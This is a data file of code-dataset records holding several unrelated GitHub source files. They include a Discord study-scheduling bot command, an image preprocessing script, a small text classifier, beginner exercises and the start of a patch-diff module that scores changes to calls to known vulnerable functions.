out_msg.delete()\n await message.delete()\n except discord.HTTPException:\n pass\n\n if message.content.lower() == 'c':\n return\n\n to_cancel = [\n joined_rows[index]\n for index in parse_ranges(message.content) if index < len(joined_rows)\n ]\n if not to_cancel:\n return await ctx.error_reply(\"No valid sessions selected for cancellation.\")\n elif any(row['start_at'] < utc_now() for row in to_cancel):\n return await ctx.error_reply(\"You can't cancel a running session!\")\n\n slotids = [row['slotid'] for row in to_cancel]\n async with room_lock:\n deleted = accountability_members.delete_where(\n userid=ctx.author.id,\n slotid=slotids\n )\n\n # Handle case where the slot has already opened\n # TODO: Possible race condition if they open over the hour border? Might never cancel\n for row in to_cancel:\n aguild = AGuild.cache.get(row['guildid'], None)\n if aguild and aguild.upcoming_slot and aguild.upcoming_slot.data:\n if aguild.upcoming_slot.data.slotid in slotids:\n aguild.upcoming_slot.members.pop(ctx.author.id, None)\n if aguild.upcoming_slot.channel:\n try:\n await aguild.upcoming_slot.channel.set_permissions(\n ctx.author,\n overwrite=None\n )\n except discord.HTTPException:\n pass\n await aguild.upcoming_slot.update_status()\n break\n\n ctx.alion.addCoins(sum(row[2] for row in deleted))\n\n remaining = [row for row in joined_rows if row['slotid'] not in slotids]\n if not remaining:\n await ctx.embed_reply(\"Cancelled all your upcoming scheduled sessions!\")\n else:\n next_booked_time = min(row['start_at'] for row in remaining)\n if len(to_cancel) > 1:\n await ctx.embed_reply(\n \"Cancelled `{}` upcoming sessions!\\nYour next session is at .\".format(\n len(to_cancel),\n next_booked_time.timestamp()\n )\n )\n else:\n await ctx.embed_reply(\n \"Cancelled your session at !\\n\"\n \"Your next session is at .\".format(\n to_cancel[0]['start_at'].timestamp(),\n next_booked_time.timestamp()\n )\n )\n elif command == 'book':\n # Show booking menu\n # Get attendee count\n rows = accountability_member_info.select_where(\n guildid=ctx.guild.id,\n userid=NOTNULL,\n select_columns=(\n 'slotid',\n 'start_at',\n 'COUNT(*) as num'\n ),\n _extra=\"GROUP BY start_at, slotid\"\n )\n attendees = {row['start_at']: row['num'] for row in rows}\n attendee_pad = max((len(str(num)) for num in attendees.values()), default=1)\n\n # Build lines\n already_joined_times = set(row['start_at'] for row in joined_rows)\n start_time = utc_now().replace(minute=0, second=0, microsecond=0)\n times = (\n start_time + datetime.timedelta(hours=n)\n for n in range(1, 25)\n )\n times = [\n time for time in times\n if time not in already_joined_times and (time - utc_now()).total_seconds() > 660\n ]\n lines = [\n \"`[{num:>2}]` | `{count:>{count_pad}}` attending | {time}\".format(\n num=i,\n count=attendees.get(time, 0), count_pad=attendee_pad,\n time=time_format(time),\n )\n for i, time in enumerate(times)\n ]\n # TODO: Nicer embed\n # TODO: Don't allow multi bookings if the member has a bad attendance rate\n out_msg = await ctx.reply(\n content=(\n \"Please reply with the number(s) of the sessions you want to book. E.g. `1, 3, 5` or `1-3, 7-8`.\"\n ),\n embed=discord.Embed(\n title=\"Please choose the sessions you want to schedule.\",\n description='\\n'.join(lines),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"All times are in your own timezone! Hover over a time to see the date.\"\n )\n )\n )\n await ctx.cancellable(\n out_msg,\n cancel_message=\"Booking menu cancelled, no sessions were booked.\",\n timeout=60\n )\n\n def check(msg):\n valid = msg.channel == ctx.ch and msg.author == ctx.author\n valid = valid and (re.search(multiselect_regex, msg.content) or msg.content.lower() == 'c')\n return valid\n\n with ensure_exclusive(ctx):\n try:\n message = await ctx.client.wait_for('message', check=check, timeout=30)\n except asyncio.TimeoutError:\n try:\n await out_msg.edit(\n content=None,\n embed=discord.Embed(\n description=\"Booking menu timed out, no sessions were booked.\",\n colour=discord.Colour.red()\n )\n )\n await out_msg.clear_reactions()\n except discord.HTTPException:\n pass\n return\n\n try:\n await out_msg.delete()\n await message.delete()\n except discord.HTTPException:\n pass\n\n if message.content.lower() == 'c':\n return\n\n to_book = [\n times[index]\n for index in parse_ranges(message.content) if index < len(times)\n ]\n if not to_book:\n return await ctx.error_reply(\"No valid sessions selected.\")\n elif any(time < utc_now() for time in to_book):\n return await ctx.error_reply(\"You can't book a running session!\")\n cost = len(to_book) * ctx.guild_settings.accountability_price.value\n if cost > ctx.alion.coins:\n return await ctx.error_reply(\n \"Sorry, booking `{}` sessions costs `{}` coins, and you only have `{}`!\".format(\n len(to_book),\n cost,\n ctx.alion.coins\n )\n )\n\n # Add the member to data, creating the row if required\n slot_rows = accountability_rooms.fetch_rows_where(\n guildid=ctx.guild.id,\n start_at=to_book\n )\n slotids = [row.slotid for row in slot_rows]\n to_add = set(to_book).difference((row.start_at for row in slot_rows))\n if to_add:\n slotids.extend(row['slotid'] for row in accountability_rooms.insert_many(\n *((ctx.guild.id, start_at) for start_at in to_add),\n insert_keys=('guildid', 'start_at'),\n ))\n accountability_members.insert_many(\n *((slotid, ctx.author.id, ctx.guild_settings.accountability_price.value) for slotid in slotids),\n insert_keys=('slotid', 'userid', 'paid')\n )\n\n # Handle case where the slot has already opened\n # TODO: Fix this, doesn't always work\n aguild = AGuild.cache.get(ctx.guild.id, None)\n if aguild:\n if aguild.upcoming_slot and aguild.upcoming_slot.start_time in to_book:\n slot = aguild.upcoming_slot\n if not slot.data:\n # Handle slot activation\n slot._refresh()\n channelid, messageid = await slot.open()\n accountability_rooms.update_where(\n {'channelid': channelid, 'messageid': messageid},\n slotid=slot.data.slotid\n )\n else:\n slot.members[ctx.author.id] = SlotMember(slot.data.slotid, ctx.author.id, ctx.guild)\n # Also update the channel permissions\n try:\n await slot.channel.set_permissions(ctx.author, view_channel=True, connect=True)\n except discord.HTTPException:\n pass\n await slot.update_status()\n ctx.alion.addCoins(-cost)\n\n # Ack purchase\n embed = discord.Embed(\n title=\"You have scheduled the following session{}!\".format('s' if len(to_book) > 1 else ''),\n description=(\n \"*Please attend all your scheduled sessions!*\\n\"\n \"*If you can't attend, cancel with* `{}schedule cancel`\\n\\n{}\"\n ).format(\n ctx.best_prefix,\n '\\n'.join(time_format(time) for time in to_book),\n ),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"Use {prefix}schedule to see your current schedule.\\n\"\n ).format(prefix=ctx.best_prefix)\n )\n try:\n await ctx.reply(\n embed=embed,\n reference=ctx.msg\n )\n except discord.NotFound:\n await ctx.reply(embed=embed)\n else:\n # Show accountability room information for this user\n # Accountability profile\n # Author\n # Special case for no past bookings, emphasis hint\n # Hint on Bookings section for booking/cancelling as applicable\n # Description has stats\n # Footer says that all times are in their timezone\n # TODO: attendance requirement shouldn't be retroactive! Add attended data column\n # Attended `{}` out of `{}` booked (`{}%` attendance rate!)\n # Attendance streak: `{}` days attended with no missed sessions!\n # Add explanation for first time users\n\n # Get all slots the member has ever booked\n history = accountability_member_info.select_where(\n userid=ctx.author.id,\n # start_at=LEQ(utc_now() - datetime.timedelta(hours=1)),\n start_at=LEQ(utc_now()),\n select_columns=(\"*\", \"(duration > 0 OR last_joined_at IS NOT NULL) AS attended\"),\n _extra=\"ORDER BY start_at DESC\"\n )\n\n if not (history or joined_rows):\n # First-timer information\n about = (\n \"You haven't scheduled any study sessions yet!\\n\"\n \"Schedule a session by typing **`{}schedule book`** and selecting \"\n \"the hours you intend to study, \"\n \"then attend by joining the session voice channel when it starts!\\n\"\n \"Only if everyone attends will they get the bonus of `{}` LionCoins!\\n\"\n \"Let's all do our best and keep each other accountable 🔥\"\n ).format(\n ctx.best_prefix,\n ctx.guild_settings.accountability_bonus.value\n )\n embed = discord.Embed(\n description=about,\n colour=discord.Colour.orange()\n )\n embed.set_footer(\n text=\"Please keep your DMs open so I can notify you when the session starts!\\n\",\n icon_url=hint_icon\n )\n await ctx.reply(embed=embed)\n else:\n # Build description with stats\n if history:\n # First get the counts\n attended_count = sum(row['attended'] for row in history)\n total_count = len(history)\n total_duration = sum(row['duration'] for row in history)\n\n # Add current session to duration if it exists\n if history[0]['last_joined_at'] and (utc_now() - history[0]['start_at']).total_seconds() < 3600:\n total_duration += int((utc_now() - history[0]['last_joined_at']).total_seconds())\n\n # Calculate the streak\n timezone = ctx.alion.settings.timezone.value\n\n streak = 0\n current_streak = None\n max_streak = 0\n day_attended = None\n date = utc_now().astimezone(timezone).replace(hour=0, minute=0, second=0, microsecond=0)\n daydiff = datetime.timedelta(days=1)\n\n i = 0\n while i < len(history):\n row = history[i]\n i += 1\n if not row['attended']:\n # Not attended, streak broken\n pass\n elif row['start_at'] > date:\n # They attended this day\n day_attended = True\n continue\n elif day_attended is None:\n # Didn't attend today, but don't break streak\n day_attended = False\n date -= daydiff\n i -= 1\n continue\n elif not day_attended:\n # Didn't attend the day, streak broken\n date -= daydiff\n i -= 1\n pass\n else:\n # Attended the day\n streak += 1\n\n # Move window to the previous day and try the row again\n date -= daydiff\n day_attended = False\n i -= 1\n continue\n\n max_streak = max(max_streak, streak)\n if current_streak is None:\n current_streak = streak\n streak = 0\n\n # Handle loop exit state, i.e. the last streak\n if day_attended:\n streak += 1\n max_streak = max(max_streak, streak)\n if current_streak is None:\n current_streak = streak\n\n # Build the stats\n table = {\n \"Sessions\": \"**{}** attended out of **{}**, `{:.0f}%` attendance rate.\".format(\n attended_count,\n total_count,\n (attended_count * 100) / total_count,\n ),\n \"Time\": \"**{:02}:{:02}** in scheduled sessions.\".format(\n total_duration // 3600,\n (total_duration % 3600) // 60\n ),\n \"Streak\": \"**{}** day{} with no missed sessions! (Longest: **{}** day{}.)\".format(\n current_streak,\n 's' if current_streak != 1 else '',\n max_streak,\n 's' if max_streak != 1 else '',\n ),\n }\n desc = prop_tabulate(*zip(*table.items()))\n else:\n desc = (\n \"Good luck with your next session!\\n\"\n )\n\n # Build currently booked list\n\n if joined_rows:\n # TODO: (Future) calendar link\n # Get attendee counts for currently booked sessions\n rows = accountability_member_info.select_where(\n slotid=[row[\"slotid\"] for row in joined_rows],\n userid=NOTNULL,\n select_columns=(\n 'slotid',\n 'guildid',\n 'start_at',\n 'COUNT(*) as num'\n ),\n _extra=\"GROUP BY start_at, slotid, guildid ORDER BY start_at ASC\"\n )\n attendees = {\n row['start_at']: (row['num'], row['guildid']) for row in rows\n }\n attendee_pad = max((len(str(num)) for num, _ in attendees.values()), default=1)\n\n # TODO: Allow cancel to accept multiselect keys as args\n show_guild = any(guildid != ctx.guild.id for _, guildid in attendees.values())\n guild_map = {}\n if show_guild:\n for _, guildid in attendees.values():\n if guildid not in guild_map:\n guild = ctx.client.get_guild(guildid)\n if not guild:\n try:\n guild = await ctx.client.fetch_guild(guildid)\n except discord.HTTPException:\n guild = None\n guild_map[guildid] = guild\n\n booked_list = '\\n'.join(\n \"`{:>{}}` attendees | {} {}\".format(\n num,\n attendee_pad,\n time_format(start),\n \"\" if not show_guild else (\n \"on this server\" if guildid == ctx.guild.id else \"in **{}**\".format(\n guild_map[guildid] or \"Unknown\"\n )\n )\n ) for start, (num, guildid) in attendees.items()\n )\n booked_field = (\n \"{}\\n\\n\"\n \"*If you can't make your session, please cancel using `{}schedule cancel`!*\"\n ).format(booked_list, ctx.best_prefix)\n\n # Temporary footer for acclimatisation\n # footer = \"All times are displayed in your own timezone!\"\n footer = \"Book another session using {}schedule book\".format(ctx.best_prefix)\n else:\n booked_field = (\n \"Your schedule is empty!\\n\"\n \"Book another session using `{}schedule book`.\"\n ).format(ctx.best_prefix)\n footer = \"Please keep your DMs open for notifications!\"\n\n # Finally, build embed\n embed = discord.Embed(\n colour=discord.Colour.orange(),\n description=desc,\n ).set_author(\n name=\"Schedule statistics for {}\".format(ctx.author.name),\n icon_url=ctx.author.avatar_url\n ).set_footer(\n text=footer,\n icon_url=hint_icon\n ).add_field(\n name=\"Upcoming sessions\",\n value=booked_field\n )\n\n # And send it!\n await ctx.reply(embed=embed)\n\n\n# TODO: roomadmin\n","repo_name":"justw0rk/StudyLion","sub_path":"bot/modules/accountability/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":23897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"11494869336","text":"import os, subprocess, argparse\n\nparser = argparse.ArgumentParser(description = \"A preprocessor that creates webp's from png's and svg's from tikz standalone LaTeX files.\")\nparser.add_argument('-f', '--forceRegenerateFiles', nargs='*',\n help=\"Force regenerate given files. No arguments will force regenerate all files.\",\n metavar=\"File names\")\nargs = parser.parse_args()\nrootdir = os.path.dirname(os.path.abspath(__file__)) + \"/images\"\n\ndef pngToWebp(pngPath, webpPath):\n subprocess.run(f\"cwebp -q 100 -lossless -mt '{pngPath}' -o '{webpPath}'\", shell=True)\n\ndef texToSvg(file, directory):\n dviName = file[:-3] + \"dvi\"\n subprocess.run(f\"latex {file}\", shell=True, cwd=directory)\n subprocess.run(f\"dvisvgm --exact --font-format=woff {dviName}\", shell=True, cwd=directory)\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n if args.forceRegenerateFiles is None:\n forceRegenerate = False\n else:\n if len(args.forceRegenerateFiles) != 0:\n forceRegenerate = file in args.forceRegenerateFiles\n else:\n forceRegenerate = True\n\n path = os.path.join(subdir, file)\n if file.endswith(\"png\"):\n webpPath = path[:-3] + \"webp\"\n if not os.path.exists(webpPath) or forceRegenerate:\n pngToWebp(path, webpPath)\n elif file.endswith(\"tex\"):\n svgPath = path[:-3] + \"svg\"\n if not os.path.exists(svgPath) or forceRegenerate:\n texToSvg(file, subdir)\n","repo_name":"OmarEmaraDev/squircle","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21478131828","text":"import tensorflow as tf\n\nfrom sklearn.utils import shuffle\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n# config \nvocab_size = 1000\nembedding_dim = 16\nmax_length = 100\ntrunc_type='post'\npadding_type='post'\noov_tok = \"\"\ntraining_size = 150\n\n\n# read data\nsentences = []\nlabels = []\n\nf = open('politics', 'r') \nlines = f.readlines() \nfor line in lines:\n sentences.append(line)\n labels.append(1)\nf.close()\n\nf = open('sports', 'r') \nlines = f.readlines() \nfor line in lines:\n sentences.append(line)\n labels.append(0)\nf.close()\n\nprint(len(sentences))\n\n# shuffle\nsentences, labels = shuffle(sentences, labels, random_state=0)\n\n# configure training & testing data\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\n\n# tokenizer\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# work with tensorflow 2.x\nimport numpy as np\ntraining_padded = np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\n# configure keras network\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])\n\nmodel.summary()\n\n# train\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs, validation_data=(testing_padded, testing_labels), verbose=2)\n\n\n# plot\nimport matplotlib.pyplot as plt\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_'+string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_'+string])\n plt.show()\n \nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n# wtf\ndef decode_sentence(text):\n return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\n# ?\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape) # shape: (vocab_size, embedding_dim)\n\n# write files\nimport io\n\nout_v = io.open('vecs.tsv', 'w', encoding='utf-8')\nout_m = io.open('meta.tsv', 'w', encoding='utf-8')\nfor word_num in range(1, vocab_size):\n word = reverse_word_index[word_num]\n embeddings = weights[word_num]\n out_m.write(word + \"\\n\")\n out_v.write('\\t'.join([str(x) for x in embeddings]) + \"\\n\")\nout_v.close()\nout_m.close()\n\nsentence = [\"Landing in Wisconsin. Launching big new ship contract!\", \n \"LAW & ORDER!\",\n \"Told that @NYCMayor Bill de Blasio wants to paint the fabled & beautiful Fifth Avenue, right in front of Trump Tower/Tiffany, with a big yellow Black Lives Matter sign. \\“Pigs in a Blanket, Fry ‘Em Like Bacon\\”, referring to killing Police, is their chant. NYC Police are furious!\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))","repo_name":"Fmaj7-dev/paipai","sub_path":"src/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37578247270","text":"#hangman program\ndef error_Handle_Word():\n bool = True;\n while bool == True:\n userInput = str(input(\"Enter a word: \"))\n count = 0;\n special_count = 0;\n list(userInput)\n lenUserInput = len(userInput)\n #use of ascii to check if input contains only numbers\n for a in range(0, lenUserInput, 1):\n char=userInput[a];\n ascii=ord(char);\n if ascii <97 or ascii >122:\n count = count +1\n if ascii == 32:\n count = count -1\n special_count = special_count +1\n if count == 0 and special_count != lenUserInput:\n\n bool = False;\n return userInput\n\n else:\n print(\"Re-enter valid input\");\n\n\ndef stringPrompt(string):\n arrayString = list(string);\n length= len(arrayString);\n dashArray = []\n for x in range(length):\n dashArray.append(\"_\");\n return arrayString, dashArray\ndef charPrompt():\n bool = True;\n while bool == True:\n guess = str(input(\"enter a letter\"))\n arrayGuess = list(guess)\n length = len(arrayGuess)\n if length == 1:\n ascii=ord(guess);\n if ascii>96 and ascii <123:\n bool = False\n\n return guess\ndef comparison(guess, arrayString, dashArray):\n length = len(arrayString)\n count = 0\n for x in range(length):\n if arrayString[x]==guess:\n dashArray[x] = guess;\n count=count+1\n #False -> did not find char\n if count == 0:\n return False\n #True -> found char\n if count >0:\n return True;\n return null\ndef usedGuess(charGuess):\n return null\ndef main():\n strike_counter = 0\n\n strike_display = []\n usedGuess = []\n string = error_Handle_Word();\n arrayString, dashArray = stringPrompt(string)\n win_length = len(arrayString)\n print(dashArray)\n #add a not winner thing\n print(\"___\\n|\\n|\\n|\")\n while strike_counter < 6 and arrayString != dashArray:\n if strike_counter == 1:\n print(\"___\\n| O\\n|\\n|\");\n elif strike_counter == 2:\n print(\"___\\n| O\\n| |\\n|\")\n elif strike_counter == 3:\n print(\"___\\n| O\\n| \\|\\n|\")\n elif strike_counter == 4:\n print(\"___\\n| O\\n| \\|/\\n|\")\n elif strike_counter == 5:\n print(\"___\\n| O\\n| \\|/\\n| /\")\n\n guess = charPrompt()\n usedGuess.append(guess)\n strike = comparison(guess, arrayString, dashArray)\n if strike == False:\n strike_counter = strike_counter+1\n strike_display.append(\"X\")\n print(\"Used letters: \", usedGuess)\n print(\"Strikes: \", strike_display)\n print(dashArray)\n if strike_counter == 6:\n print(\"___\\n| O\\n| \\|/\\n| /\\\\\")\n print(\"You lose\")\n elif arrayString == dashArray:\n print(\"You win\")\n #if strike == 6 you lose else you are a winner\n\nmain();\n","repo_name":"mmamel/CS160H","sub_path":"assignment_5.py","file_name":"assignment_5.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33350072923","text":"import numpy as np \nimport random as r \nfrom scipy import misc\nimport matplotlib.pyplot as plt\nimport math\nimport os\n\ndef getColor(char):\n\tr = char\n\tg = char*char%256\n\tb = char*char*char%256\n\treturn [r,g,b]\n\nfilename = os.getcwd() + '/codeToImage.py'\nfilename = '/media/dodo/M3NT0R/Privat/Projekte/ticTacToe/tic5.py'\nf1 = open(filename,'r')\ncontent = f1.read()\nf1.close()\n\ncontent = content.replace('\\t',' ')\ncontent = content.split('\\n')\nmaximum = []\nimage = []\nfor element in content:\n\tmaximum.append(len(element))\n\timage.append([])\nmaximum = max(maximum)\n\nfor i in range(len(content)):\n\tcontent[i] = content[i] + (maximum - len(content[i]))*' '\n\nfor i in range(len(content)):\n\ttmp = []\n\tfor char in content[i]:\n\t\ttmp.append(getColor(ord(char)))\n\timage[i] = tmp\n\nimage = misc.toimage(image)\nmisc.imsave('test.png',image)\n","repo_name":"dodonator/metaCode","sub_path":"codeToImage.py","file_name":"codeToImage.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35965081100","text":"import sys\n\ninput = sys.stdin.readline\n\ns = list(input().rstrip())\nlst = [0]*26\nfor c in s:\n if c.isupper():\n lst[ord(c)-65] +=1\n else:\n lst[ord(c)-97] +=1\n\nmax_ = 0\nans = 0\nfor i in range(len(lst)):\n if lst[i]>max_:\n ans = i\n max_ = lst[i]\n elif lst[i]==max_:\n ans = -2\nprint(chr(ans+65))","repo_name":"hyunkyungju/problem-solving","sub_path":"백준/Bronze/1157. 단어 공부/단어 공부.py","file_name":"단�� 공부.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36779857891","text":"#plan\n#need to go through the frequencise and pass through the filters which is a list in a list\n#need to figure out way to check with each fiter range and return a count\n\nfrom collections import Counter\n\n\ndef countSignals(frequencies, filterRanges):\n # Write your code here\n store_nums = []\n for ranges in filterRanges:\n for number in frequencies:\n if number in range(ranges[0], ranges[1]):\n \n store_nums.append(number)\n\n \n \n counted_dict= dict(Counter(store_nums))\n \n amount = 0\n \n counted_dict = dict((k, v) for k, v in counted_dict.items() if v == len(filterRanges))\n return (len(counted_dict))\n # if len(filterRanges) in counted_dict.values():\n # print(\"\")\n\n # for freq in counted_dict:\n # print(freq, \"test\")\n # if freq.get() == len(filterRanges):\n \n # amount += 1\n \n # print(amount)","repo_name":"ddelfaus/Practice-Problems","sub_path":"HackerRank/thing2/filteringsingals.py","file_name":"filteringsingals.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69962019732","text":"import compare.compare\nimport core.score\nimport features.feature\nimport features.function_features.naming_parsing\nimport features.groupby\nfrom features.function_features import naming_parsing\n\n\nimport collections\nimport compare.compare_function\nimport features.function_features.overview_functions\nfrom features.function_features.build_cfg.utils import cfg_info_to_score\nimport features.function_features.changed_constants\nimport core.utils\n\n\ndef score_xref_function_name(feature_type, compare_object, scores, reduce_function, type_of_change=compare.compare.TypesOfChanges.CHANGED, **kwargs):\n for xref_to_look_type_of_change, base_score, pe_index in scores:\n xref_changes = compare_object.get_changed_called_functions(xref_to_look_type_of_change)\n pe_obj = compare_object.objects_to_compare[pe_index].get_pe_obj()\n for added_func in xref_changes:\n function_name = pe_obj.get_function_name(added_func[pe_index][0], False) # TODO: update to short format\n is_match_lock = reduce_function(function_name)\n if is_match_lock:\n change_calls = {\"before\": added_func[compare.compare.OLDEST][1],\n \"after\": added_func[compare.compare.NEWEST][1],\n \"address_before\": added_func[compare.compare.OLDEST][0],\n \"address_after\": added_func[compare.compare.NEWEST][0]\n }\n change_calls.update(kwargs)\n yield core.score.Score(base_score, feature_type,\n [compare_object.objects_to_compare[compare.compare.NEWEST]],\n [compare_object.objects_to_compare[compare.compare.OLDEST]],\n reason=function_name, type_of_change=type_of_change, **change_calls)\n\n\ndef score_mapping_replaced_functions(feature_type, compare_object, base_score, is_functions_are_interesting_replacing\n , **kwargs):\n xref_changes = compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.REMOVED)\n xref_changes = xref_changes.union(compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.ADDED))\n xref_changes = xref_changes.union(compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.CHANGED))\n replaced_functions = detect_replaced_functions(xref_changes)\n new_pe_obj = compare_object.objects_to_compare[compare.compare.NEWEST].get_pe_obj()\n old_pe_obj = compare_object.objects_to_compare[compare.compare.OLDEST].get_pe_obj()\n for before_func, after_func, diff in replaced_functions:\n if before_func[0] is None or after_func[0] is None:\n raise ValueError(\"didn't expect to have mapping with None\")\n\n before_func_name = old_pe_obj[before_func[0]].function_name(True)\n after_func_name = new_pe_obj[after_func[0]].function_name(True)\n\n is_interesting_replacement = is_functions_are_interesting_replacing(old_pe_obj[before_func[0]].function_name(False),\n new_pe_obj[after_func[0]].function_name(False))\n if is_interesting_replacement:\n change_calls = {\"name_before\": before_func_name,\n \"name_after\": after_func_name,\n \"before\": before_func[1],\n \"after\": after_func[1],\n \"diff\": diff,\n \"address_before\": before_func[0],\n \"address_after\": after_func[0]}\n score = base_score\n if type(is_interesting_replacement) == int:\n score = base_score + (is_interesting_replacement / 4)\n\n change_calls.update(kwargs)\n yield core.score.Score(score, feature_type,\n [compare_object.objects_to_compare[compare.compare.NEWEST]],\n [compare_object.objects_to_compare[compare.compare.OLDEST]],\n type_of_change=compare.compare.TypesOfChanges.CHANGED,\n **change_calls)\n\n\ndef detect_replaced_functions(function_calls):\n \"\"\"\n\n :param function_calls: list of tuples ((address old (int), number of xrefs before(int)), (address_new(int), number_of_xrefs (int)))\n :return: list of tuples (function_call, function_call)\n \"\"\"\n added = {}\n removed = {}\n for function_call_before, function_call_after in function_calls:\n before = function_call_before[1]\n after = function_call_after[1]\n diff = after - before\n\n chosen_dict = added\n chosen_call = function_call_after\n if diff < 0:\n chosen_dict = removed\n chosen_call = function_call_before\n\n if diff not in chosen_dict:\n chosen_dict[diff] = []\n\n if chosen_call[0] is None: # no function address\n continue\n\n chosen_dict[diff].append(chosen_call)\n\n swapped = []\n for diff, added_funcs in added.items():\n if diff <= 0: # we're going to ignore no changes or negative change (to reduce double mapping)\n continue\n for added_func in added_funcs:\n replaced_functions = removed.get(-diff, [])\n for old_fun in replaced_functions:\n swapped.append([old_fun, added_func, diff])\n\n return swapped\n\n\n# ################################ Features from known list ###############################################\n\nclass XrefVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefVulnerableFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 50, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 50, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_name_known_vulnerable_func):\n yield score\n\n\nclass XrefLogicalVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefLogicalVulnerableFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 50, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 25, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_known_logical_vulnerable_func):\n yield score\n\n\nclass LogicalVulnerableFixup(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"LogicalVulnerableFixup\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 40, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 70, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_function_is_fixup):\n yield score\n\n\nclass StrSafeFunction(features.feature.SimpleFunctionFeature):\n # https://docs.microsoft.com/en-us/windows/win32/api/strsafe/\n # https://www.defcon.org/images/defcon-18/dc-18-presentations/Oh/DEFCON-18-Oh-Exploit-Spotting.pdf\n METHOD_NAME = \"StrSafeFunction\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 10, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 30, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, -5, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_is_strsafe_function):\n yield score\n\n\nclass IntSafeFunctions(features.feature.SimpleFunctionFeature):\n # int_safe_functions should be inline but inline (recommended to the compiler) we might catch that.\n METHOD_NAME = \"IntSafeFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = 